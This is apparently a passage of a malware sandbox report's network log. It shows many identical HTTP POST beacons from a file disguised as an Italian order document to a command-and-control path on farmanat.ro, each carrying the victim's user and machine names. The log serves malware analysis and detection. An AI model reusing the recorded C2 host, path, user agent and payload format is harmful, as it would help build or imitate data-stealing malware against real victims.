                                              Nov 25, 2021 10:50:22.715112925 CET6680OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:22.764718056 CET6680INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              261192.168.11.2050103176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:23.190149069 CET6681OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:23.224267006 CET6681OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:23.279185057 CET6682INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              262192.168.11.2050104176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:23.717956066 CET6682OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:23.751558065 CET6683OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:23.802470922 CET6683INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              263192.168.11.2050105176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:24.185755968 CET6684OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:24.219649076 CET6684OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:24.289542913 CET6684INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              264192.168.11.2050106176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:24.703006983 CET6685OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:24.737179041 CET6685OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:24.981559992 CET6686INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              265192.168.11.2050107176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:25.332854033 CET6686OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:25.366420031 CET6686OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:25.665313005 CET6687INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              266192.168.11.2050108176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:26.078077078 CET6688OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:26.111706972 CET6688OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:26.376755953 CET6688INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              267192.168.11.2050109176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:26.807857990 CET6689OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:26.842061043 CET6689OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:27.173216105 CET6690INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              268192.168.11.2050110176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:27.596260071 CET6690OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:27.630498886 CET6690OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:27.975099087 CET6691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              269192.168.11.2050111176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:28.402048111 CET6692OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:28.436250925 CET6692OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:28.492588997 CET6692INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              27192.168.11.2049862176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:19.071831942 CET6342OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:19.105864048 CET6342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:19.155915022 CET6343INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              270192.168.11.2050112176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:28.896038055 CET6693OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:28.930179119 CET6693OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:28.986506939 CET6694INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              271192.168.11.2050113176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:29.419476032 CET6694OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:29.452986956 CET6694OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:29.507684946 CET6695INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              272192.168.11.2050114176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:29.941230059 CET6696OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:29.975507021 CET6696OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:30.027120113 CET6696INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              273192.168.11.2050115176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:30.460479021 CET6697OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:30.494013071 CET6697OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:30.543375015 CET6697INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              274192.168.11.2050116176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:30.962182045 CET6698OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:30.995687962 CET6698OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:31.045028925 CET6699INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              275192.168.11.2050117176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:31.469315052 CET6700OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:31.503714085 CET6700OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:31.557591915 CET6700INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              276192.168.11.2050118176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:31.996695042 CET6701OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:32.030255079 CET6701OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:32.082495928 CET6701INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              277192.168.11.2050119176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:32.501487970 CET6702OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:32.535531998 CET6702OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:32.603969097 CET6703INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              278192.168.11.2050120176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
